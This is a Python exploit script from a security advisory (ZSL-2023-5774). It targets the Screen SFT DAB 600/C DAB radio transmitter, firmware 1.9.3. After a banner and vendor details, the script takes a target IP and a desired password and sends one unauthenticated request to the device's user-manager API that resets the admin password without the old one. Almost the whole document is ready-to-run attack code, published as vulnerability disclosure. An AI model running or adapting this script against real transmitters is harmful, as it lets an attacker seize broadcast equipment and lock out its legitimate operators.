Headline
Screen SFT DAB 600/C Authentication Bypass / Admin Password Change
Screen SFT DAB 600/C exploit that circumvents the control and requirement of the admin’s old password and directly changes the password.
#!/usr/bin/env python3### Screen SFT DAB 600/C Authentication Bypass Admin Password Change Exploit### Vendor: DB Elettronica Telecomunicazioni SpA# Product web page: https://www.screen.it | https://www.dbbroadcast.com# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/# Affected version: Firmware: 1.9.3# Bios firmware: 7.1 (Apr 19 2021)# Gui: 2.46# FPGA: 169.55# uc: 6.15## Summary: Screen's new radio DAB Transmitter is reaching the highest# technology level in both Digital Signal Processing and RF domain.# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the# digital adaptive precorrection and configuatio flexibility, the Hot# Swap System technology, the compactness and the smart system design,# the SFT DAB are advanced transmitters. They support standards DAB,# DAB+ and T-DMB and are compatible with major headend brands.## Desc: This exploit circumvents the control and requirement of admin's# old password and directly changes the password.## Tested on: Keil-EWEB/2.1# MontaVista® Linux® Carrier Grade eXpress (CGX)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2023-5774# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php### 19.03.2023#import hashlib,datetime##########import requests,colorama#########from colorama import Fore, Style#colorama.init()print(Fore.RED+Style.BRIGHT+ '''██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL)print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL)s=datetime.datetime.now()s=s.strftime('%d.%m.%Y %H:%M:%S')print('Starting API XPL -',s)t=input('Enter transmitter ip: ')p=input('Enter desired password: ')e='/system/api/userManager.cgx'm5=hashlib.md5()m5.update(p.encode('utf-8'))h=m5.hexdigest()print('Your sig:',h)print('Calling object: ssbtObj')print('CGX fastcall: userManager::changeUserPswd')t='http://'+t+ebh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber-+', 'Connection':'close'}j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'changeUserPswd':{ 'username':'admin', 'password':h } }, }r=requests.post(t,headers=bh,json=j)if r.status_code==200: print('Done.')else: print('Error')exit(-2)